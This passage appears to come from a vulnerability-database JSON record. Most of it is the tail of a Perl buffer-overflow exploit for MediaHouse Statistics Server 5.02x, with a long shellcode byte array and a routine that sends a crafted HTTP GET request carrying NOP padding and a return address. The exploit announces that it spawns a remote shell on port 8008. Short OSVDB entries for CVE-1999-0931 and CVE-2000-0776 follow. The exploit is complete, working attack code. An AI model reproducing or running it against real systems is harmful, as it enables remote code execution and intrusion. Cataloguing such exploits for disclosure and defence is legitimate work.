",\"\\xd9\",\"\\x99\",\"\\x9b\",\r\n\"\\x96\",\"\\x1b\",\"\\x8e\",\"\\x98\",\"\\x99\",\"\\x99\",\"\\x18\",\"\\x24\",\"\\x07\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x98\",\"\\xb9\",\"\\x99\",\"\\x99\",\"\\xeb\",\"\\x97\",\r\n\"\\x09\",\"\\x09\",\"\\x09\",\"\\x09\",\"\\x5e\",\"\\x1c\",\"\\x07\",\"\\x8d\",\"\\xd9\",\r\n\"\\x99\",\"\\x99\",\"\\xb9\",\"\\x99\",\"\\x99\",\"\\xf3\",\"\\x99\",\"\\x12\",\"\\x1c\",\r\n\"\\x07\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x24\",\"\\x07\",\"\\x8d\",\"\\xd9\",\r\n\"\\x99\",\"\\xce\",\"\\xc9\",\"\\x12\",\"\\x1c\",\"\\x13\",\"\\x8d\",\"\\xd9\",\"\\x99\",\r\n\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\xbb\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\r\n\"\\x66\",\"\\x0c\",\"\\x3b\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\xa9\",\"\\x66\",\r\n\"\\x0c\",\"\\x33\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x12\",\"\\x1c\",\"\\x07\",\"\\x8d\",\r\n\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\x99\",\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\x13\",\"\\x8d\",\r\n\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\x0b\",\"\\x8d\",\"\\xd9\",\r\n\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\xfc\",\"\\x8a\",\"\\xd9\",\"\\x99\",\r\n\"\\xf3\",\"\\x99\",\"\\x14\",\"\\x24\",\"\\x07\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xce\",\r\n\"\\xf3\",\"\\x99\",\"\\xf3\",\"\\x99\",\"\\xf3\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\xbb\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\x03\",\"\\x8a\",\r\n\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\xa9\",\"\\x66\",\"\\x0c\",\"\\x33\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\xaa\",\"\\x50\",\"\\xa0\",\"\\x14\",\"\\x07\",\"\\x8d\",\"\\xd9\",\"\\x99\",\r\n\"\\x96\",\"\\x1e\",\"\\xfe\",\"\\x66\",\"\\x66\",\"\\x66\",\"\\xf3\",\"\\x99\",\"\\xf1\",\r\n\"\\x99\",\"\\xb9\",\"\\x99\",\"\\x99\",\"\\x09\",\"\\x14\",\"\\x2c\",\"\\x13\",\"\\x8d\",\r\n\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\x0b\",\"\\x8d\",\"\\xd9\",\r\n\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\xf0\",\"\\x8a\",\"\\xd9\",\"\\x99\",\r\n\"\\x10\",\"\\x1c\",\"\\x03\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\x99\",\"\\x14\",\r\n\"\\x24\",\"\\x07\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xce\",\"\\xc9\",\"\\x14\",\"\\x2c\",\r\n\"\\x13\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\xbf\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\x3f\",\"\\x8a\",\r\n\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\xa9\",\"\\x66\",\"\\x0c\",\"\\x33\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\xf3\",\"\\x99\",\"\\x12\",\"\\x1c\",\"\\x03\",\"\\x8d\",\"\\xd9\",\"\\x99\",\r\n\"\\x14\",\"\\x24\",\"\\x07\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xce\",\"\\xc9\",\"\\x12\",\r\n\"\\x1c\",\"\\x13\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\xbb\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\x3b\",\"\\x8a\",\r\n\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\xa9\",\"\\x66\",\"\\x0c\",\"\\x33\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\x70\",\"\\x90\",\"\\x67\",\"\\x66\",\"\\x66\",\"\\x14\",\"\\x2c\",\"\\x0b\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\xf4\",\"\\x8a\",\r\n\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\x0f\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\r\n\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\xf4\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\x99\",\r\n\"\\x66\",\"\\x0c\",\"\\x2b\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xc8\",\"\\xcf\",\"\\xf1\",\r\n\"\\x6d\",\"\\x39\",\"\\xdc\",\"\\x99\",\"\\xc3\",\"\\x66\",\"\\x8b\",\"\\xc9\",\"\\xc2\",\r\n\"\\xc0\",\"\\xce\",\"\\xc7\",\"\\xc8\",\"\\xcf\",\"\\xca\",\"\\xf1\",\"\\xe5\",\"\\x38\",\r\n\"\\xdc\",\"\\x99\",\"\\xc3\",\"\\x66\",\"\\x8b\",\"\\xc9\",\"\\x35\",\"\\x1d\",\"\\x59\",\r\n\"\\xec\",\"\\x62\",\"\\xc1\",\"\\x32\",\"\\xc0\",\"\\x7b\",\"\\x73\",\"\\x5a\",\"\\xce\",\r\n\"\\xca\",\"\\xd6\",\"\\xda\",\"\\xd2\",\"\\xaa\",\"\\xab\",\"\\x99\",\"\\xea\",\"\\xf6\",\r\n\"\\xfa\",\"\\xf2\",\"\\xfc\",\"\\xed\",\"\\x99\",\"\\xfb\",\"\\xf0\",\"\\xf7\",\"\\xfd\",\r\n\"\\x99\",\"\\xf5\",\"\\xf0\",\"\\xea\",\"\\xed\",\"\\xfc\",\"\\xf7\",\"\\x99\",\"\\xf8\",\r\n\"\\xfa\",\"\\xfa\",\"\\xfc\",\"\\xe9\",\"\\xed\",\"\\x99\",\"\\xea\",\"\\xfc\",\"\\xf7\",\r\n\"\\xfd\",\"\\x99\",\"\\xeb\",\"\\xfc\",\"\\xfa\",\"\\xef\",\"\\x99\",\"\\xfa\",\"\\xf5\",\r\n\"\\xf6\",\"\\xea\",\"\\xfc\",\"\\xea\",\"\\xf6\",\"\\xfa\",\"\\xf2\",\"\\xfc\",\"\\xed\",\r\n\"\\x99\",\"\\xd2\",\"\\xdc\",\"\\xcb\",\"\\xd7\",\"\\xdc\",\"\\xd5\",\"\\xaa\",\"\\xab\",\r\n\"\\x99\",\"\\xda\",\"\\xeb\",\"\\xfc\",\"\\xf8\",\"\\xed\",\"\\xfc\",\"\\xc9\",\"\\xf0\",\r\n\"\\xe9\",\"\\xfc\",\"\\x99\",\"\\xde\",\"\\xfc\",\"\\xed\",\"\\xca\",\"\\xed\",\"\\xf8\",\r\n\"\\xeb\",\"\\xed\",\"\\xec\",\"\\xe9\",\"\\xd0\",\"\\xf7\",\"\\xff\",\"\\xf6\",\"\\xd8\",\r\n\"\\x99\",\"\\xda\",\"\\xeb\",\"\\xfc\",\"\\xf8\",\"\\xed\",\"\\xfc\",\"\\xc9\",\"\\xeb\",\r\n\"\\xf6\",\"\\xfa\",\"\\xfc\",\"\\xea\",\"\\xea\",\"\\xd8\",\"\\x99\",\"\\xc9\",\"\\xfc\",\r\n\"\\xfc\",\"\\xf2\",\"\\xd7\",\"\\xf8\",\"\\xf4\",\"\\xfc\",\"\\xfd\",\"\\xc9\",\"\\xf0\",\r\n\"\\xe9\",\"\\xfc\",\"\\x99\",\"\\xde\",\"\\xf5\",\"\\xf6\",\"\\xfb\",\"\\xf8\",\"\\xf5\",\r\n\"\\xd8\",\"\\xf5\",\"\\xf5\",\"\\xf6\",\"\\xfa\",\"\\x99\",\"\\xcb\",\"\\xfc\",\"\\xf8\",\r\n\"\\xfd\",\"\\xdf\",\"\\xf0\",\"\\xf5\",\"\\xfc\",\"\\x99\",\"\\xce\",\"\\xeb\",\"\\xf0\",\r\n\"\\xed\",\"\\xfc\",\"\\xdf\",\"\\xf0\",\"\\xf5\",\"\\xfc\",\"\\x99\",\"\\xca\",\"\\xf5\",\r\n\"\\xfc\",\"\\xfc\",\"\\xe9\",\"\\x99\",\"\\xda\",\"\\xf5\",\"\\xf6\",\"\\xea\",\"\\xfc\",\r\n\"\\xd1\",\"\\xf8\",\"\\xf7\",\"\\xfd\",\"\\xf5\",\"\\xfc\",\"\\x99\",\"\\xdc\",\"\\xe1\",\r\n\"\\xf0\",\"\\xed\",\"\\xcd\",\"\\xf1\",\"\\xeb\",\"\\xfc\",\"\\xf8\",\"\\xfd\",\"\\x99\",\r\n\"\\x9b\",\"\\x99\",\"\\x86\",\"\\xd1\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x95\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x98\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\xda\",\"\\xd4\",\"\\xdd\",\"\\xb7\",\"\\xdc\",\"\\xc1\",\"\\xdc\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x89\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x90\",\"\\x90\");\r\n\r\n# -------------------------------------------------------------------\r\n\r\nsub pcommands\r\n{\r\n\tdie \"usage: $0 hostname port\\n\" if (@ARGV != 2);\r\n\t($host) = shift @ARGV;\r\n\t($port) = shift @ARGV;\r\n}\r\n\r\nsub show_credits\r\n{\r\n\tprint \"\\n\\n\\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\\n\";\r\n\tprint \"\\n\\t\\t Coded by |Zan - izan\\@deepzone.org\\n\";\r\n\tprint \"\\n\\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\\n\\n\";\r\n}\r\n\r\nsub bofit\r\n{\r\n\r\n\tprint \"\\nspawning remote shell on port 8008 ...\\n\\n\";\r\n\r\n\t$s = IO::Socket::INET->new(PeerAddr=>$host,\r\n PeerPort=>$port,\r\n\t\t\t\t Proto=>\"tcp\");\r\n\r\n\tif(!$s) { die \"error.\\n\"; }\t\r\n\r\n\tprint $s \"GET http://O\";\r\n\r\n\tforeach $item (@crash) {\r\n \tprint $s $item\r\n } \r\n\r\n\tfor ($cont=0; $cont<840;$cont++) {\r\n\t\tprint $s \"\\x90\"\r\n }\r\n\r\n\tprint $s \"\\x8c\\x3e\\x1d\\x01\";\r\n\r\n\tprint $s \"\\r\\n\\r\\n\";\r\n\r\n\twhile (<$s>) { print }\r\n\r\n\tprint \"... done.\\n\\n\";\r\n\r\n}\r\n\r\n# ----- begin\r\n\r\nshow_credits;\r\npcommands;\r\nbofit;\r\n\r\n# ----- that's all :)\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20148/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-0931"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q3/1141.html\nISS X-Force ID: 3286\n[CVE-1999-0931](https://vulners.com/cve/CVE-1999-0931)\nBugtraq ID: 734\n", "modified": "1999-09-30T00:00:00", "published": "1999-09-30T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1119", "id": "OSVDB:1119", "title": "MediaHouse Statistics Server server ID Login Page Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "cvelist": ["CVE-2000-0776"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 5113\n[CVE-2000-0776](https://vulners.com/cve/CVE-2000-0776)\nBugtraq ID: 1568\n", "modified": "2000-08-10T00:00:00", "published": "2000-08-10T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1507", "id": "OSVDB:1507", "title": "Mediahouse Statistics Server HTTP GET Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}